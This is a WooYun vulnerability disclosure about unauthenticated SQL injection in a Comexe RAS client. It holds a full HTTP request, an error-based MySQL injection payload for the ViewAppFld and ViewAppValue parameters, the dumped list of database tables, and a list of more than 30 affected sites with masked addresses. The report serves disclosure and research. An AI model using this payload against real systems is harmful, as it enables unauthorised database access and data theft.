科迈某客户端两处SQL注入影响大量系统(无需登录DBA权限)

发表于 2015年06月05日
WooYun漏洞库

漏洞概要

缺陷编号：WooYun-2015-0117921

漏洞标题：科迈某客户端两处SQL注入影响大量系统(无需登录DBA权限)

相关厂商：深圳市科迈通讯技术有限公司

漏洞作者：YY-2012

提交时间：2015-06-05 11:57

公开时间：2015-09-06 09:08

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签：

漏洞详情

披露状态：

2015-06-05: 细节已通知厂商并且等待厂商处理中
2015-06-08: 厂商已经确认，细节仅向厂商公开
2015-06-11: 细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航、无声信息）
2015-08-02: 细节向核心白帽子及相关领域专家公开
2015-08-12: 细节向普通白帽子公开
2015-08-22: 细节向实习白帽子公开
2015-09-06: 细节向公众公开

简要描述：

附30多个案例。。

详细说明：

科迈RAS标准版客户端(远程快速应用接入)无需登录存在SQL注入。

POST /server/cmxpagedquery.php?pgid=AppList&SearchFlag=true HTTP/1.1<br>
Content-Length: 136<br>
Content-Type: application/x-www-form-urlencoded<br>
Referer: **.**.**.**:80/<br>
Cookie: PHPSESSID=jb7b826hb3p30jf2rdt17mr8n0; RAS_Client_Style=1; g_LanguageID=cn; RAS_Admin_UserInfo_Domain=aa-ecf4369da2f8; temp_DisplayName=tmtgrnvr; temp_Description=%E5%85%81%E8%AE%B8%E7%94%A8%E6%88%B7%E8%BF%9C%E7%A8%8B%E8%AE%BF%E9%97%AE%E6%AD%A4%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%8A%E7%9A%84%E6%96%87%E4%BB%B6%E5%A4%B9; ErrorInfo=%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E4%BF%A1%E6%81%AF%3A+Parameter+3%3A+%E7%B1%BB%E5%9E%8B%E4%B8%8D%E5%8C%B9%E9%85%8D%E3%80%82%0D%0A+++%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E6%89%80%E5%9C%A8%E6%96%87%E4%BB%B6%3A+C%3A%5CProgram+Files%5CComexe%5CRasMini%5Crasweb%5CApache2%5Chtdocs%5Csmarty-2.6.19%5CServer%5CCmxUserGroup.php+%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E6%89%80%E5%9C%A8%E8%A1%8C%E5%8F%B7%3A+386+%E8%A1%8C%3Cbr+%2F%3E<br>
Host: **.**.**.**<br>
Connection: Keep-alive<br>
Accept-Encoding: gzip,deflate<br>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36<br>
Accept: */*AppID%5b-1%5d=651&clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=1*&ViewAppValue=1

POST /server/cmxpagedquery.php?pgid=AppList&SearchFlag=true HTTP/1.1

Content-Length: 136

Content-Type: application/x-www-form-urlencoded

Referer: **.**.**.**:80/

Cookie: PHPSESSID=jb7b826hb3p30jf2rdt17mr8n0; RAS_Client_Style=1; g_LanguageID=cn; RAS_Admin_UserInfo_Domain=aa-ecf4369da2f8; temp_DisplayName=tmtgrnvr; temp_Description=%E5%85%81%E8%AE%B8%E7%94%A8%E6%88%B7%E8%BF%9C%E7%A8%8B%E8%AE%BF%E9%97%AE%E6%AD%A4%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%8A%E7%9A%84%E6%96%87%E4%BB%B6%E5%A4%B9; ErrorInfo=%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E4%BF%A1%E6%81%AF%3A+Parameter+3%3A+%E7%B1%BB%E5%9E%8B%E4%B8%8D%E5%8C%B9%E9%85%8D%E3%80%82%0D%0A+++%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E6%89%80%E5%9C%A8%E6%96%87%E4%BB%B6%3A+C%3A%5CProgram+Files%5CComexe%5CRasMini%5Crasweb%5CApache2%5Chtdocs%5Csmarty-2.6.19%5CServer%5CCmxUserGroup.php+%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E6%89%80%E5%9C%A8%E8%A1%8C%E5%8F%B7%3A+386+%E8%A1%8C%3Cbr+%2F%3E

Host: **.**.**.**

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36

Accept: */*AppID%5b-1%5d=651&clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=1*&ViewAppValue=1

两个参数存在SQL注入分别是：ViewAppFld和ViewAppValue

漏洞证明：

---<br>
Parameter: #1* ((custom) POST)<br>
    Type: error-based<br>
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause<br>
    Payload: AppID[-1]=651&clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=1) AND (SELECT 4511 FROM(SELECT COUNT(*),CONCAT(0x716b7a7671,(SELECT (ELT(4511=4511,1))),0x71716a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (1461=1461&ViewAppValue=1<br>
---<br>
web server operating system: Windows<br>
web application technology: PHP 5.2.6, Apache 2.2.9<br>
back-end DBMS: MySQL 5.0<br>
Database: rasdatabase<br>
[71 tables]<br>
+---------------------------+<br>
| hbadminrolegroupmembers   |<br>
| hbadminrolerestrictedorgs |<br>
| hbadminroletask           |<br>
| hbadminroleusermembers    |<br>
| hbclientgroupapplication  |<br>
| hbclientgroupprinter      |<br>
| hbdirectoryapplication    |<br>
| hborgapplication          |<br>
| hborglicensepolicy        |<br>
| hborgpolicy               |<br>
| hbpolicyvalues            |<br>
| hbroletask                |<br>
| hbserverapplication       |<br>
| hbserverprinterdriver     |<br>
| hbserverprintinf          |<br>
| hbserverrole              |<br>
| hbservertask              |<br>
| hbtaskaction              |<br>
| hbtaskcondition           |<br>
| hbuserapplication         |<br>
| hbuserdirectory           |<br>
| hbuserorgs                |<br>
| hbuserpolicy              |<br>
| lograsarchi               |<br>
| lograsconcurrenta         |<br>
| lograsconcurrentus        |<br>
| lograsent                 |<br>
| lograssessi               |<br>
| lograstaskactionhist      |<br>
| lograstaskhist            |<br>
| rasactions                |<br>
| rasadminroles             |<br>
| rasadmintasks             |<br>
| rasapplication            |<br>
| rasbadprinterdriver       |<br>
| rascfg                    |<br>
| rasclient                 |<br>
| rasclientgroup            |<br>
| rascompatibilitydriver    |<br>
| rasconcurrentsession      |<br>
| rasconditions             |<br>
| rasconnectionsetting      |<br>
| rasdatabase               |<br>
| rasdirectory              |<br>
| rasdmzserverd             |<br>
| rasdomain                 |<br>
| rasgroupuser              |<br>
| rasinfocollectordata      |<br>
| rasjobs                   |<br>
| rasjobsteps               |<br>
| raslicenseinfo            |<br>
| raslicensetoken           |<br>
| raslicpolicy              |<br>
| raslockdownpolicies       |<br>
| rasmonthlyminute          |<br>
| rasorgs                   |<br>
| rasprinter                |<br>
| rasprinterdriver          |<br>
| rasproductk               |<br>
| rasreqids                 |<br>
| rasroles                  |<br>
| rasrunningservers         |<br>
| rasselection              |<br>
| rasserver                 |<br>
| rasstyle                  |<br>
| rastasks                  |<br>
| rasticketing              |<br>
| rastimedsessio            |<br>
| rasuser                   |<br>
| rasusermng                |<br>
| usermachines              |<br>
+---------------------------+

---

Parameter: #1* ((custom) POST)

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause

Payload: AppID[-1]=651&clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=1) AND (SELECT 4511 FROM(SELECT COUNT(*),CONCAT(0x716b7a7671,(SELECT (ELT(4511=4511,1))),0x71716a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (1461=1461&ViewAppValue=1

---

web server operating system: Windows

web application technology: PHP 5.2.6, Apache 2.2.9

back-end DBMS: MySQL 5.0

Database: rasdatabase

[71 tables]

+---------------------------+

| hbadminrolegroupmembers |

| hbadminrolerestrictedorgs |

| hbadminroletask |

| hbadminroleusermembers |

| hbclientgroupapplication |

| hbclientgroupprinter |

| hbdirectoryapplication |

| hborgapplication |

| hborglicensepolicy |

| hborgpolicy |

| hbpolicyvalues |

| hbroletask |

| hbserverapplication |

| hbserverprinterdriver |

| hbserverprintinf |

| hbserverrole |

| hbservertask |

| hbtaskaction |

| hbtaskcondition |

| hbuserapplication |

| hbuserdirectory |

| hbuserorgs |

| hbuserpolicy |

| lograsarchi |

| lograsconcurrenta |

| lograsconcurrentus |

| lograsent |

| lograssessi |

| lograstaskactionhist |

| lograstaskhist |

| rasactions |

| rasadminroles |

| rasadmintasks |

| rasapplication |

| rasbadprinterdriver |

| rascfg |

| rasclient |

| rasclientgroup |

| rascompatibilitydriver |

| rasconcurrentsession |

| rasconditions |

| rasconnectionsetting |

| rasdatabase |

| rasdirectory |

| rasdmzserverd |

| rasdomain |

| rasgroupuser |

| rasinfocollectordata |

| rasjobs |

| rasjobsteps |

| raslicenseinfo |

| raslicensetoken |

| raslicpolicy |

| raslockdownpolicies |

| rasmonthlyminute |

| rasorgs |

| rasprinter |

| rasprinterdriver |

| rasproductk |

| rasreqids |

| rasroles |

| rasrunningservers |

| rasselection |

| rasserver |

| rasstyle |

| rastasks |

| rasticketing |

| rastimedsessio |

| rasuser |

| rasusermng |

| usermachines |

+---------------------------+

案例：**.**.**.**:8080/cmxlogin.php?t=14328474426374**.**.**.**:81/CmxDownload.php**.**.**.**/CmxDownload.php**.**.**.**:8888/CmxDownload.php**.**.**.**:8080/CmxDownload.php**.**.**.**:8080/CmxDownload.php**.**.**.**:8888/CmxDownload.php**.**.**.**:8080/CmxDownload.php**.**.**.**:81/CmxDownload.php**.**.**.**:8080/CmxDownload.php**.**.**.**/CmxDownload.php**.**.**.**:8888/CmxDownload.php**.**.**.**:8000/cmxlogin.php?t=14328287201481**.**.**.**:8888/CmxDownload.php**.**.**.**:81/CmxDownload.php**.**.**.**:8080/CmxDownload.php**.**.**.**:8888/CmxDownload.phphttp://**.**.**.**:8088/CmxDownload.php**.**.**.**/CmxDownload.php**.**.**.**/CmxDownload.php**.**.**.**:8080/CmxDownload.php**.**.**.**:8000/CmxDownload.php**.**.**.**/cmxlogin.php?t=14328022273495**.**.**.**:8080/CmxDownload.php**.**.**.**/CmxDownload.php**.**.**.**:81/CmxDownload.php**.**.**.**:81/CmxDownload.php**.**.**.**:8080/CmxDownload.php**.**.**.**:8080/CmxDownload.php**.**.**.**:81/CmxDownload.php**.**.**.**:81/CmxDownload.php**.**.**.**:8080/cmxlogin.php?t=14327793397546**.**.**.**:81/CmxDownload.php**.**.**.**/CmxDownload.php**.**.**.**:81/CmxDownload.php**.**.**.**/CmxDownload.php**.**.**.**:8001/CmxDownload.php**.**.**.**:81/CmxDownload.php**.**.**.**:8888/CmxDownload.php**.**.**.**/CmxDownload.php